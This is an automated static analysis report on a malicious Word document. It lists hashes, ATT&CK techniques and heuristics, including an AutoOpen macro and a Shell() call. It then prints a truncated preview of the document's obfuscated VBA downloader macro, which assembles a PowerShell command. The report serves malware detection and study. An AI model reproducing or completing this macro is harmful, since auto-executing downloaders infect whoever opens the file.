Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 29b44011a541d736…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 101.5 KB
Created: 2018-02-13 17:41:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: 51152560d745cfccb82243d54e006ab4
SHA-1: b2c9658189a59c6509680ccf0cab35a2f419a89c
SHA-256: 29b44011a541d73661a141b256bbdcd31f4ee6c80cccd94e2fe43761fe916cbc
Risk score: 182

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen function, a common technique for executing malicious code as soon as a document is opened. The critical heuristic firing for a Shell() call in VBA, combined with the AutoOpen macro, strongly suggests execution of a secondary payload. The obfuscated script attempts to construct a URL, most likely for downloading additional malware. The presence of the Shell() call together with the AutoOpen macro points to a malicious document designed to execute arbitrary code, fitting the pattern of a spearphishing attachment.

Heuristics (6)

  • VBA macros detected [medium] OLE_VBA_MACROS (3 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://iyl+iylwww.enjnZ1+nZ1oye (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 26326 bytes
SHA-256: 097d967c1956d5386670a589dd693cf6e3c8caaf77155447648d7cb6a40364c2

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "oOrLdDSddU"
Sub AutoOpen()
On Error Resume Next
mIQGDhBXK = Itjmr - Sgn(pdqUOhfrYkVqEf) - (24989 - Tan(8305373) / 6317623 - ChrW(IsQ))
AUTcGJoKr = KbS - Sgn(ZqjD) - (882933 - Tan(5523430) / 4875551 - ChrW(TMLSfIQMhd))
wioIXsIXq = hjLOlaaAAw - Sgn(PrS) - (211060 - Tan(1463390) / 3146888 - ChrW(djtiWjcjPQTn))
Application.Run "wAsSbVzCS", wWYmDfMPtUovCl
vjmsznAwh = hQLi - Sgn(irWHPcUu) - (2005456 - Tan(7467715) / 607595 - ChrW(imCKK))
hMDXdwSNH = GYwdSoG - Sgn(stJDLbmbGwiVK) - (5957811 - Tan(8977805) / 4486456 - ChrW(ziCEsDtIINV))
LJkUYsJRB = AbkCsVjlJ - Sgn(dbuTJDozp) - (2919865 - Tan(9148259) / 617405 - ChrW(RPwMKz))
End Sub
Function wWYmDfMPtUovCl()
On Error Resume Next
ncpWpV = joVBPhTiaQvpMj - Sgn(pko) - (7414882 - Tan(2184142) / 9291198 - ChrW(UASbwZDTrqtn))
PcjNAaWZ = NTw - Sgn(pUXIdjXCd) - (3844479 - Tan(8448747) / 6764731 - ChrW(OqCvT))
kDzTwAh = ioktiHY - Sgn(vYfq) - (4227483 - Tan(7434727) / 2513743 - ChrW(qYfrRuZSFLkicC))
EjWbIJsojvQ = kfJwCWNffqK + Mid(knsrvmnBozqWnG + "JQwNvNjKjSJJJhZ12KdnZ1)2Kd'+'&( ([StrIng]Jq9VErbOsEprEfeRbvn+bvnENcE)[1,'+'3]+nZ1xnZ1-joINnZ1nZ1)bvn)-rePLace ([cH'+'ar]50+[cHar]75+[cdumXPBWJoalWzMz" + tiMPNYhTBBC, 15, 120)
jnhAiJQu = nXzWXarQffnmS - Sgn(VbpniKCHsRvbY) - (7718924 - Tan(7205917) / 4952452 - ChrW(JCiqafzZZ))
RIpAt = jwkoQVTwM - Sgn(jQRqffjaw) - (384819 - Tan(575208) / 5982725 - ChrW(Cijk))
lMbjLAku = uwqO - Sgn(jTJH) - (5598594 - Tan(5963999) / 1142565 - ChrW(rYwt))
zYGtSzHuB = ItzPnFatAEib + Mid(zdVwzRzdP + "adRWXaZKhHt(sRK?iynZ1+nZ1l+iynZ1+nZ1lsiyl+iynZ1+nZ1lRK);iyl+iyl3iyl+iylcbvn+bvniylbvn+bvn+iylmSiyl+iylDC =bvn+bvn 3ciyl+iylmeiynZ1+nZ1l+iylniyl+iylv:iyl+iylpublic + sRiyl+i'+'ylK8RzsvlQJKnXI" + DoPRoTXuc, 11, 172)
tmrZE = wrtAwSljMPR - Sgn(SzUpqHIX) - (6378065 - Tan(719196) / 4286484 - ChrW(XwcmaMziZZjt))
WOwik = BTVjfVG - Sgn(wkw) - (4123147 - Tan(1502618) / 3974165 - ChrW(BlDuVDdApzGzSi))
wQpMatwVdMC = tNbUpnnoBiPlYM - Sgn(QSrwhoVpY) - (3460038 - Tan(4578642) / 3827018 - ChrW(kZVoVwqkun))
WwSzYo = lsLuzYcXXEsiK + Mid(lOBQnVMhWV + "BBCfqJuKBPsOkfwVnnKphyl+iylEiyl+iylOadFIuqEleiyl+iynZ1+bvn+bvn'+'nZ1'+'lD'+'fe(iyl+iynZ1+nZ1l3cmasfiyl+iylciybvn+bvnl+iyl.iyl+i'+'ylDfiyl+bvn+bvniyleTiyl+iyloSiylnZ1+nZ1+'+'iyltiyl+iylruqiylnZ1+nZ1+iylEiuqENgDfiyl'YfwbiR" + CvqzLGJI, 22, 193)
UTRCLjAlGO = UrTdSATjTClN - Sgn(VnSLqkN) - (8302742 - Tan(951579) / 8744039 - ChrW(ziBiRSLI))
WKPshi = jjTEvkBwnpBqw - Sgn(umDh) - (6172371 - Tan(8921544) / 9834128 - ChrW(PztdozoPAqdSop))
ZzMRlMWjF = NQGiPDP - Sgn(jAYGsNkfNwjQV) - (2156130 - Tan(3424581) / 9286111 - ChrW(JYo))
VOOWUJcBWJ = LNzCLFREnLi + Mid(HTALYYDCRTID + "OijAzwZ1+EqKBljLsFJQQcfEuDCJqfZGwjV" + MbQZWtWfM, 7, 3)
GOwzoEvUOK = zCwKjFfb - Sgn(WUGBZXSFCL) - (8295891 - Tan(3224653) / 3077263 - ChrW(ojJ))
iZkPcXhW = XYzzJM - Sgn(VnTPiiNYYm) - (1536481 - Tan(1862650) / 8437655 - ChrW(dzFMKNHh))
TXJUujWFBzc = JdX - Sgn(IChZLtUEkwpXh) - (5711151 - Tan(8505061) / 8293999 - ChrW(jWRqta))
ziiwpL = MfRFSpRZ + Mid(kszFJ + "hMiSWCQHAoFsDCZCwJRAEsYMREZObACE '+'iyluqEiyl,[Char]96-rePlAc'+'e (bvn'+'+bvn[Char]115+[Char]82+[Char]75),[C'+'har]39-nZ1+nZ1rePlAce([Char]6bvn+bvn8+[Char]102+[Char]101),[Char]34) Cje&bvn+bvn( 51eIs" + QswBQLPWE, 30, 167)
qOwmMFYCrRT = NuvRwoEPuYWz - Sgn(kGu) - (4580022 - Tan(46298) / 5418967 - ChrW(vUPIwzhiC))
HLrYaOYkUUa = qtDYiVbBvJL - Sgn(iLtqlrAL) - (5749760 - Tan(2767658) / 911 - ChrW(tsfmU))
HUfBDUM = GZNJhdwcCkSWFS - Sgn(WmDPGOq) - (5655190 - Tan(8278817) / 1341485 - ChrW(tsipqpjwD))
MYWMAdpcdV = kwzYnmKlHmFVrN + Mid(QXStwPpdkPqmcH + "cCcfvSrNUwnFhXq'$') ) rsrGzNjiTrzYB" + BOco, 16, 7)
NkvpIkm = zzTLAH - Sgn(OSSMmppVYj) - (8135669 - Tan(2178884) / 5390280 - ChrW(QRASMNtC))
AVjSs = CfPjYDmY - Sgn(qif) - (1961038 - Tan(4411562) / 9250855 - ChrW(qUrATVtYr))
UHvPEiKY = hSsotoMvQh - Sgn(GQSmHn
... (truncated)